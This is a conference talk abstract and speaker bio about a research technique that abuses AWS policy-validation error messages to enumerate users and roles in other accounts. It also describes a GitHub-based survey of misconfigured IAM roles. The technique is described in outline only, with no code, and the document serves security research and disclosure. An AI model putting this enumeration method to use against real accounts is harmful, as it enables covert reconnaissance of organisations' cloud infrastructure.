Jay Chen

Title: From API Information Leakage to Pwned AWS Accounts

Abstract

: In this talk, I will show a set of AWS resource policy APIs that can be abused to leak the existing users and roles in arbitrary AWS accounts. Using this technique, I conducted a reconnaissance research on GitHub to look for AWS accounts with misconfigured IAM policies. The research identified hundreds of thousands of EC2 snapshots and hundreds of S3 buckets (not publicly exposed).

While AWS strives to provide more granular permissions and simplify the policy creation process, a convenient feature that validates the user-created policies inadvertently leaks account-specific information in error messages. One can repeatedly invoke a policy-update API with crafted user/role names to gradually build up the target account’s roster. Because the error messages are raised at the policy creator’s account, the target account can’t observe the enumeration.

In the second part of the research, I used this technique to scrape GitHub and find AWS accounts with misconfigured IAM roles. I went through account verification, role name extraction, role name enumeration, and misconfiguration identification. The reconnaissance found misconfigured accounts with thousands of workloads belonging to billion-dollar organizations. Bio: Dr. Jay Chen is a cloud security researcher with Prisma Cloud and Unit 42. He has extensive research experience in cloud-native and DevOps security. His current research focuses on investigating the vulnerabilities, design flaws, and adversary tactics in cloud-native technologies such as containers and serverless applications. In the past, he also researched mobile cloud and distributed storage security. Jay has authored 20+ academic and industrial papers.